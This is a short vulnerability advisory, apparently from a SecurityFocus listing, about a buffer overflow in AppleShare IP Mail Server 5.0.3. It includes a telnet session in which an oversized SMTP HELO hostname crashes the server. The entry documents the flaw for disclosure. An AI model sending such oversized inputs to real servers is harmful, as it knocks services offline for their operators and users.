15 lines
No EOL
582 B
Text
15 lines
No EOL
582 B
Text
source: http://www.securityfocus.com/bid/61/info
|
|
|
|
There exists a buffer overflow in the Apple AppleShare IP Mail Server 5.0.3. If yu connect to the SMTP port
|
|
and issue a HELO command with a large string (500 bytes or more) for a hostname the server, and possibly the whole machine, will crash.
|
|
|
|
$ telnet some.where
|
|
Trying 1.2.3.4...
|
|
Connected to some.where.
|
|
Escape character is '^]'.
|
|
220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
|
|
HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
|
|
[ and it just hangs ]
|
|
|
|
$ ping some.where
|
|
[ ...nothing... ] |